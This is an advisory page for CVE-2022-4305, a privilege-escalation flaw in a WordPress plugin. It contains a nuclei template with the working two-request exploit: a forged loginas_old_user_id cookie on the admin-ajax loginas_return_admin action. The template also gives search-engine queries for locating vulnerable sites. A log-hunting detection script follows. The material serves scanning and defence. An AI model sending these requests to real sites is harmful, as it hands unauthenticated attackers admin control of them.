CVE-2022-4305: Login as User or Customer < 3.3 - Privilege Escalation

Date: 2025-08-01 | Affected software: Login as User or Customer | PoC: public

Vulnerability description

The plugin lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session.

PoC code [public]

id: CVE-2022-4305

info:
  name: Login as User or Customer < 3.3 - Privilege Escalation
  author: r3Y3r53
  severity: critical
  description: |
    The plugin lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session.
  impact: |
    Unauthenticated attackers can obtain valid admin sessions by exploiting missing authorization checks in the Login as User or Customer plugin, potentially gaining complete control over the WordPress site and all user accounts.
  remediation: |
    Fixed in version 3.3
  reference:
    - https://wpscan.com/vulnerability/286d972d-7bda-455c-a226-fd9ce5f925bd
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4305
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4305
    cwe-id: CWE-269
    epss-score: 0.88487
    epss-percentile: 0.99481
    cpe: cpe:2.3:a:wp-buy:login_as_user_or_customer_\(user_switching\):*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wp-buy
    product: login_as_user_or_customer_\(user_switching\)
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/login-as-customer-or-user
    fofa-query: body=/wp-content/plugins/login-as-customer-or-user
    publicwww-query: /wp-content/plugins/login-as-customer-or-user
  tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,login-as-customer-or-user,auth-bypass,wp-buy,vuln

http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1
        Host: {{Hostname}}
        Cookie: loginas_old_user_id=1
      - |
        GET /wp-admin/users.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code_2 == 200
          - contains(header_2, "text/html")
          - contains(body_2, 'Edit Profile') && contains(body_2, 'All Posts')
        condition: and
# digest: 4a0a00473045022026719e4b90c50b6dae87ed47fbcd0bd5ceb35fd0dc9d42efe4698fbad2848b8c0221008b9ee2b506f29fba53081c1354f36b9ab18d8ae1be05fd24aec6ac9d1b08a7b7:922c64590222798bb761d5b6d8e72950
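The template above reaches the vulnerable `admin-ajax.php` action and then checks whether the follow-up `users.php` request returns an admin page. The same two-step pattern is what a defender would look for in web server logs. The following is an added example, not part of the advisory or the nuclei template: it scans combined-format access log lines for unauthenticated requests to `action=loginas_return_admin` and correlates each hit with a subsequent `/wp-admin/users.php` 200 from the same client. The log lines, IP addresses and timestamps are constructed samples; the five-minute correlation window is an assumption.

```python
"""Hunt for CVE-2022-4305 exploitation attempts in access logs.

Added example, not the advisory's or the plugin's own code.  Scans
Apache/nginx combined-format log lines for the admin-ajax request with the
vulnerable `loginas_return_admin` action and flags whether the same client
went on to load /wp-admin/users.php successfully.  All sample data is
constructed.
"""
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Combined log format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
VULN_ACTION = "loginas_return_admin"      # action named in the advisory
FOLLOWUP_PATH = "/wp-admin/users.php"     # admin page the template checks


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], TS_FMT)
    entry["status"] = int(entry["status"])
    return entry


def is_loginas_trigger(entry):
    """True when the request targets admin-ajax.php with the vulnerable action."""
    parts = urlsplit(entry["path"])
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return False
    return VULN_ACTION in parse_qs(parts.query).get("action", [])


def find_suspicious(lines, window=timedelta(minutes=5)):
    """Return one finding per trigger request, noting any admin follow-up.

    The window is an assumed correlation interval, not a value from the advisory.
    """
    entries = [e for e in map(parse_line, lines) if e]
    findings = []
    for t in (e for e in entries if is_loginas_trigger(e)):
        followup = any(
            e["ip"] == t["ip"]
            and urlsplit(e["path"]).path == FOLLOWUP_PATH
            and e["status"] == 200
            and t["ts"] <= e["ts"] <= t["ts"] + window
            for e in entries
        )
        findings.append({"ip": t["ip"], "ts": t["ts"], "admin_followup": followup})
    return findings


# Constructed sample log lines (documentation-range IPs).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2025:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Aug/2025:10:00:02 +0000] "GET /wp-admin/users.php HTTP/1.1" 200 48213 "-" "Mozilla/5.0"',
    '198.51.100.5 - - [01/Aug/2025:10:01:10 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 61 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [01/Aug/2025:10:05:00 +0000] "GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1" 302 0 "-" "curl/8.0"',
    'not a log line',
]

if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG):
        flag = "admin page reached" if f["admin_followup"] else "no admin follow-up"
        print(f"{f['ts'].isoformat()} {f['ip']} loginas_return_admin ({flag})")
```

A benign `heartbeat` call to `admin-ajax.php` is ignored because only the `action` value matters, and a trigger with no successful `users.php` follow-up is still reported so that blocked or failed attempts remain visible. On a patched site (3.3 or later) the trigger request should not yield an admin session, so any finding with `admin_followup` set is the one to escalate.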
